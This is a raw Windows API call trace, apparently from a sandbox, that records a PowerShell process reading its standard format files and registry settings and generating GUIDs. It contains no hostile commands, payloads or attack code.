	[0671.638] VirtualQuery (in: lpAddress=0x26bb60, lpBuffer=0x26ca20, dwLength=0x30 | out: lpBuffer=0x26ca20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.638] VirtualQuery (in: lpAddress=0x26bb60, lpBuffer=0x26ca20, dwLength=0x30 | out: lpBuffer=0x26ca20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.639] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x3a78608a, Data2=0x885d, Data3=0x4a29, Data4=([0]=0xb3, [1]=0x31, [2]=0x1e, [3]=0xfd, [4]=0x2b, [5]=0x61, [6]=0x81, [7]=0x11))) returned 0x0
	[0671.639] VirtualQuery (in: lpAddress=0x26b490, lpBuffer=0x26c350, dwLength=0x30 | out: lpBuffer=0x26c350*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.640] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc3a878e4, Data2=0x9734, Data3=0x415e, Data4=([0]=0xba, [1]=0xb1, [2]=0x3, [3]=0x62, [4]=0x79, [5]=0x8c, [6]=0x8a, [7]=0x92))) returned 0x0
	[0671.640] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe85b28ec, Data2=0x3240, Data3=0x4228, Data4=([0]=0x8c, [1]=0xb3, [2]=0x7d, [3]=0x30, [4]=0x6d, [5]=0xc2, [6]=0x4, [7]=0x62))) returned 0x0
	[0671.640] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0671.640] GetFileType (hFile=0x308) returned 0x1
	[0671.640] SetErrorMode (uMode=0x1) returned 0x1
	[0671.640] GetFileType (hFile=0x308) returned 0x1
	[0671.640] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.641] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.642] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.642] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.642] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.642] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.642] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.643] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.645] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.645] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.646] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.646] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.646] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.646] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.647] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.647] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.650] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.650] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0xbce, lpOverlapped=0x0) returned 1
	[0671.650] ReadFile (in: hFile=0x308, lpBuffer=0x333ddfe, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333ddfe*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0671.650] ReadFile (in: hFile=0x308, lpBuffer=0x333e6c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x333e6c8*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0671.650] CloseHandle (hObject=0x308) returned 1
	[0671.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0671.651] SetErrorMode (uMode=0x1) returned 0x1
	[0671.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0671.651] SetErrorMode (uMode=0x1) returned 0x1
	[0671.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0671.651] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x308) returned 0x0
	[0671.652] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0671.652] CoTaskMemAlloc (cb=0x5a) returned 0x1b8634a0
	[0671.652] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b8634a0, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0671.652] CoTaskMemFree (pv=0x1b8634a0) 
	[0671.652] RegCloseKey (hKey=0x308) returned 0x0
	[0671.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0671.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x760d1928, Data2=0xf2f1, Data3=0x40f3, Data4=([0]=0xa5, [1]=0xb7, [2]=0x74, [3]=0x45, [4]=0x8e, [5]=0x2a, [6]=0xc4, [7]=0x6e))) returned 0x0
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe70dfd65, Data2=0xef2f, Data3=0x4e3c, Data4=([0]=0xb6, [1]=0x1f, [2]=0xff, [3]=0x28, [4]=0xa5, [5]=0x48, [6]=0xd5, [7]=0x7a))) returned 0x0
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x67616e63, Data2=0xecec, Data3=0x4cfa, Data4=([0]=0xaf, [1]=0xa1, [2]=0x71, [3]=0x90, [4]=0xa8, [5]=0x5f, [6]=0x26, [7]=0x96))) returned 0x0
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc1a17abe, Data2=0xf499, Data3=0x4519, Data4=([0]=0xa9, [1]=0x88, [2]=0x68, [3]=0x82, [4]=0x3f, [5]=0x32, [6]=0x41, [7]=0x2f))) returned 0x0
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x720500fe, Data2=0x5a57, Data3=0x4287, Data4=([0]=0xaf, [1]=0xf8, [2]=0xd8, [3]=0xdf, [4]=0x5f, [5]=0xa4, [6]=0x96, [7]=0xff))) returned 0x0
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x5ec876c1, Data2=0xbbe0, Data3=0x47d9, Data4=([0]=0x93, [1]=0x54, [2]=0x17, [3]=0xb7, [4]=0xa1, [5]=0x3c, [6]=0xbe, [7]=0x21))) returned 0x0
	[0671.654] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x9816c0a9, Data2=0xce5c, Data3=0x4373, Data4=([0]=0x8d, [1]=0x17, [2]=0xf9, [3]=0x24, [4]=0xc8, [5]=0x47, [6]=0x9d, [7]=0x6e))) returned 0x0
	[0671.655] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xcc1cfba8, Data2=0xa3e4, Data3=0x4341, Data4=([0]=0xb3, [1]=0x22, [2]=0x7, [3]=0x19, [4]=0x8f, [5]=0x7e, [6]=0xde, [7]=0xc4))) returned 0x0
	[0671.655] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x56f72ca7, Data2=0xe86b, Data3=0x46bc, Data4=([0]=0x9f, [1]=0x35, [2]=0xa6, [3]=0x5b, [4]=0xd4, [5]=0x10, [6]=0xf6, [7]=0x3c))) returned 0x0
	[0671.655] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xfc91af6f, Data2=0x6680, Data3=0x4904, Data4=([0]=0xab, [1]=0x67, [2]=0xb8, [3]=0x8, [4]=0x67, [5]=0x91, [6]=0x97, [7]=0xca))) returned 0x0
	[0671.655] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4b34beb6, Data2=0x77f6, Data3=0x491f, Data4=([0]=0x9c, [1]=0x7c, [2]=0x4d, [3]=0xc3, [4]=0xe2, [5]=0x39, [6]=0xc2, [7]=0x97))) returned 0x0
	[0671.655] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x184b1faa, Data2=0x41f8, Data3=0x4fb7, Data4=([0]=0x92, [1]=0x51, [2]=0x39, [3]=0x71, [4]=0xdb, [5]=0x63, [6]=0xea, [7]=0x30))) returned 0x0
	[0671.656] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xfa38fe4d, Data2=0x816a, Data3=0x4c72, Data4=([0]=0xac, [1]=0x91, [2]=0x20, [3]=0xd8, [4]=0x46, [5]=0xdc, [6]=0x46, [7]=0x68))) returned 0x0
	[0671.656] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x34618360, Data2=0x6a1, Data3=0x48b9, Data4=([0]=0x95, [1]=0x81, [2]=0x8, [3]=0x21, [4]=0xc3, [5]=0x14, [6]=0x73, [7]=0xfc))) returned 0x0
	[0671.656] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x139d8052, Data2=0x336e, Data3=0x4d84, Data4=([0]=0x80, [1]=0xfa, [2]=0x7e, [3]=0x7d, [4]=0xa5, [5]=0x8, [6]=0x1d, [7]=0xc9))) returned 0x0
	[0671.656] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x9270ddfb, Data2=0x7f57, Data3=0x4e1e, Data4=([0]=0x8d, [1]=0x61, [2]=0x86, [3]=0xbd, [4]=0xa8, [5]=0x3f, [6]=0xd, [7]=0x69))) returned 0x0
	[0671.656] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x29af012d, Data2=0xc5e6, Data3=0x4f8f, Data4=([0]=0x87, [1]=0x4a, [2]=0x28, [3]=0xa8, [4]=0x94, [5]=0x1e, [6]=0x60, [7]=0xa7))) returned 0x0
	[0671.656] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe1ccd056, Data2=0x7571, Data3=0x40c7, Data4=([0]=0x82, [1]=0x4f, [2]=0x95, [3]=0xaf, [4]=0x90, [5]=0xf8, [6]=0x34, [7]=0x7a))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x497bbdb0, Data2=0x7ef9, Data3=0x483e, Data4=([0]=0xb5, [1]=0x2f, [2]=0x67, [3]=0x9b, [4]=0xea, [5]=0xad, [6]=0x34, [7]=0x23))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x53b8594b, Data2=0xa621, Data3=0x48af, Data4=([0]=0xa2, [1]=0x63, [2]=0xc4, [3]=0xcc, [4]=0xce, [5]=0xdf, [6]=0xb0, [7]=0x98))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe57bdb1d, Data2=0x9269, Data3=0x477c, Data4=([0]=0x93, [1]=0xb6, [2]=0xaf, [3]=0xbf, [4]=0x6c, [5]=0x4e, [6]=0x36, [7]=0x87))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x55e37485, Data2=0x1ae, Data3=0x4faf, Data4=([0]=0xa9, [1]=0x9c, [2]=0x46, [3]=0xb7, [4]=0xae, [5]=0x62, [6]=0x8b, [7]=0xf0))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe0f7fd43, Data2=0x4db, Data3=0x4108, Data4=([0]=0xb7, [1]=0x32, [2]=0x24, [3]=0x6d, [4]=0x6a, [5]=0x5d, [6]=0xcc, [7]=0xd0))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xcafe39eb, Data2=0xd921, Data3=0x4ad8, Data4=([0]=0x9c, [1]=0x5b, [2]=0x9d, [3]=0x7d, [4]=0xfc, [5]=0xe2, [6]=0xf1, [7]=0x15))) returned 0x0
	[0671.657] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xd46cb7b6, Data2=0xd1f0, Data3=0x4d7b, Data4=([0]=0x82, [1]=0x92, [2]=0xf6, [3]=0xbc, [4]=0x65, [5]=0x66, [6]=0x49, [7]=0xc0))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x810ecf88, Data2=0x84d1, Data3=0x49d7, Data4=([0]=0xb4, [1]=0x1e, [2]=0xc8, [3]=0x75, [4]=0x25, [5]=0xe1, [6]=0x21, [7]=0xba))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x8a622051, Data2=0xead6, Data3=0x43aa, Data4=([0]=0x97, [1]=0x6b, [2]=0xe6, [3]=0xe1, [4]=0x24, [5]=0xad, [6]=0xec, [7]=0xae))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xe69f61f1, Data2=0xeb47, Data3=0x43bf, Data4=([0]=0x88, [1]=0x7e, [2]=0x4b, [3]=0x2b, [4]=0x4, [5]=0x48, [6]=0x95, [7]=0xd5))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x7c8d2238, Data2=0x3e16, Data3=0x4e7c, Data4=([0]=0xb4, [1]=0x1f, [2]=0x1c, [3]=0xd9, [4]=0xff, [5]=0xc7, [6]=0xbe, [7]=0xb3))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xc0864271, Data2=0xa560, Data3=0x496e, Data4=([0]=0x9e, [1]=0xf3, [2]=0x3b, [3]=0x14, [4]=0xac, [5]=0xae, [6]=0x6a, [7]=0xf3))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x153828ec, Data2=0xaecf, Data3=0x4d68, Data4=([0]=0x8d, [1]=0x3, [2]=0x15, [3]=0x85, [4]=0xcf, [5]=0x94, [6]=0xb4, [7]=0x85))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x50270a8c, Data2=0x1e69, Data3=0x4a97, Data4=([0]=0x91, [1]=0x32, [2]=0xb5, [3]=0xa0, [4]=0x59, [5]=0x54, [6]=0x0, [7]=0x57))) returned 0x0
	[0671.658] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xb043ed4e, Data2=0x2524, Data3=0x4bda, Data4=([0]=0xa6, [1]=0x32, [2]=0x96, [3]=0x8c, [4]=0xae, [5]=0x3a, [6]=0x2b, [7]=0xfb))) returned 0x0
	[0671.659] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x779bc95e, Data2=0xff7c, Data3=0x4452, Data4=([0]=0xaf, [1]=0x9f, [2]=0xb8, [3]=0x24, [4]=0x3, [5]=0x2e, [6]=0x2b, [7]=0x1b))) returned 0x0
	[0671.659] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x7909dce2, Data2=0x2d56, Data3=0x42ce, Data4=([0]=0xb7, [1]=0x87, [2]=0xa2, [3]=0x4c, [4]=0x6f, [5]=0xc1, [6]=0x6b, [7]=0xf2))) returned 0x0
	[0671.659] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x1f51d80, Data2=0x9e3a, Data3=0x463f, Data4=([0]=0xa7, [1]=0x74, [2]=0x42, [3]=0x1f, [4]=0x3d, [5]=0x81, [6]=0xb1, [7]=0xe1))) returned 0x0
	[0671.660] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x3612ad94, Data2=0xb579, Data3=0x4f2a, Data4=([0]=0x82, [1]=0xcb, [2]=0x7f, [3]=0xdf, [4]=0x3, [5]=0xdf, [6]=0x5, [7]=0xb8))) returned 0x0
	[0671.660] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0671.660] GetFileType (hFile=0x308) returned 0x1
	[0671.660] SetErrorMode (uMode=0x1) returned 0x1
	[0671.660] GetFileType (hFile=0x308) returned 0x1
	[0671.660] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.661] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.662] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.662] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.662] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.662] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.662] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x119, lpOverlapped=0x0) returned 1
	[0671.662] ReadFile (in: hFile=0x308, lpBuffer=0x344f1a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x344f1a0*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0671.663] CloseHandle (hObject=0x308) returned 1
	[0671.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0671.663] SetErrorMode (uMode=0x1) returned 0x1
	[0671.663] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0671.663] SetErrorMode (uMode=0x1) returned 0x1
	[0671.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0671.664] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x308) returned 0x0
	[0671.664] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0671.664] CoTaskMemAlloc (cb=0x5a) returned 0x1b8634a0
	[0671.664] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b8634a0, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0671.664] CoTaskMemFree (pv=0x1b8634a0) 
	[0671.664] RegCloseKey (hKey=0x308) returned 0x0
	[0671.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
